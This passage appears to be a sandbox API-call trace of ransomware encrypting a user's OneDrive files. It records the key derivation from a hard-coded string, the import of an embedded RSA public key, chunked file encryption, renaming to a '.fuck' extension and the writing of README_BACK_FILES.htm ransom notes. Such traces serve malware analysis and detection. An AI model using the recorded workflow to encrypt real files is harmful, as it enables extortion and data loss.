(in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.386] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.386] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.387] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.387] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0273.387] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0273.387] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0273.387] CloseHandle (hObject=0x5d4c) returned 1 [0273.387] CloseHandle (hObject=0x5d48) returned 1 [0273.387] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.394] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.395] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.397] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.398] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.398] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.399] CryptReleaseContext (hProv=0x2f28c28, dwFlags=0x0) returned 1 [0273.399] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.399] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.399] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\readme_back_files.htm")) returned 0xffffffff [0273.399] AreFileApisANSI () returned 1 [0273.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0273.399] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.400] GetFileType (hFile=0x5d3c) returned 0x1 [0273.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.402] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.402] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0273.402] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.402] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.402] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.402] GetLastError () returned 0x0 [0273.402] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.402] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.403] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.404] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.406] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.406] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f295b8) returned 1 [0273.410] CryptCreateHash (in: hProv=0x2f295b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.410] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.410] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.410] CryptDeriveKey (in: hProv=0x2f295b8, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2faa48) returned 1 [0273.410] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.410] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.410] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f296c8) returned 1 [0273.410] CryptImportPublicKeyInfo (in: hCryptProv=0x2f296c8, dwCertEncodingType=0x1, pInfo=0x2f33610*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33640*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33648*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fae48) returned 1 [0273.411] CryptEncrypt (in: hKey=0x2fae48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.411] CryptEncrypt (in: hKey=0x2fae48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29c18*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29c18*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.411] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f29c18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29c18*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.412] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.423] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.423] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.424] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.424] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.425] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.425] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.441] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.441] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.442] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.442] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.442] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.442] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.442] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.443] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.444] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.445] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.445] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 